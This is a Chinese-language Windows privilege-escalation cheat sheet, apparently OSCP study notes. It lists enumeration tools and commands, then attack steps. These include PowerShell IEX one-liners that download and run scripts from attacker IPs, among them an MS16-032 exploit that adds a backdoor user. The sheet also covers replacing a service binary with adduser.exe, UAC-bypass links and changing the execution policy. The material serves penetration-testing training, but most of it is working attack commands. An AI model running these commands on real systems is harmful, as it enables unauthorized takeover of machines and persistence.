1-windows-常规流程提权+信息收集 - My-oscp-all-things

### 1.information gathering suggster #### 自动信息收集工具使用体验不分先后顺序 - beRoot.exe [beRoot.exe](https://github.com/AlessandroZ/BeRoot/releases) - windows-exploit-suggester.py ``` windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt ``` - SharpUp.exe [SharpUp.exe](https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/SharpUp.exe) - schcheck.bat [schcheck.bat](https://raw.githubusercontent.com/ankh2054/windows-pentest/master/schcheck.bat) - PrivescCheck.ps1 [PrivescCheck.ps1](https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1) - PowerUp.ps1 [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) ``` Invoke-AllChecks ``` - Seatbelt.exe [Seatbelt.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Seatbelt.exe) - SharpUp.exe [SharpUp.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe) - winpeas [winpeas](https://github.com/carlospolop/PEASS-ng/releases/download/20220515/winPEASany.exe) - PrivescCheck.ps1 [PrivescCheck.ps1](https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1) - Sherlock.ps1 [Sherlock.ps1](https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1) ``` powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/Sherlock.ps1') ; Find-AllVulns" ``` #### 在线速查 [提权辅助网页 Windows提权辅助](https://i.hacking8.com/tiquan/) [LOLBAS](https://lolbas-project.github.io/#) <a name="ZPUlZ"></a> ### 手动收集信息 ``` systeminfo whoami /all net localgroup administrators powershell -c Get-Service ``` #### 定时计划 ```bash schtasks /query /fo LIST /v C:\windows\SysWOW64\systeminfo.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe ``` #### Usbpcap ``` systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" ``` 如果有usbpcap 可尝试CVE-2017-6178 usbpcap提权 ``` c:\programe file | drivequery -v ``` 还可能会在这个目录 ``` C:\Windows\System32\DRIVERS | drivequery -v ``` #### 服务项提权 ``` Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} ``` ``` icacls "C:\Program Files\Serviio\bin\ServiioService.exe" 可选 accesschk.exe /accepteula -uwcqv "Authenticated Users" * accesschk.exe /accepteula -uwcqv "Power Users" * accesschk.exe /accepteula -uwcqv "Users" * accesschk.exe /accepteula -uwdqs "Users" c:\ accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ accesschk.exe /accepteula -uwqs "Users" "c:\Program Files" accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* ``` ``` //替换掉原先的 move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe" move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe" ``` ##### 重启服务 ``` net stop service-name sc qc regsvc //查看启动模式如果为自动则需要重启运行，如果可以手动,则看一下能否重启它直接手动 wmic service where caption="Serviio" get name, caption, state, startmode ``` ### WMIC ``` for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A" wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html wmic USERACCOUNT list full /format:"%var%" >> out.html wmic group list full /format:"%var%" >> out.html wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html wmic netuse list full /format:"%var%" >> out.html wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html ``` ### powershell ```powershell ##https://github.com/nekocode/win_penetration ##https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1 Powershell.exe Start-Process cmd.exe -Verb runAs “C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe” https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1 get-executionpolicy set-ExecutionPolicy RemoteSigned ``` <a name="qamWq"></a> ### runas ``` runas /user:admin cmd.exe ``` ```powershell 16-032 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.17.223:8000/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'" ``` ```bash #location from diff windows C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ``` <a name="YwW0s"></a> <a name="tHJxI"></a> ### windows install 提权 ``` https://github.com/klinix5/InstallerFileTakeOver 如Windows 10、Windows 11、Windows server 2022等。 ``` <a name="mWyaw"></a> ### x86 ```bash https://www.exploit-db.com/exploits/40564 #2008 r2 ``` <a name="A7yE2"></a> <a name="b8nuT"></a> ### 修复path ```bash set PATH=%SystemRoot%\system32;%SystemRoot%; ``` <a name="FoId8"></a>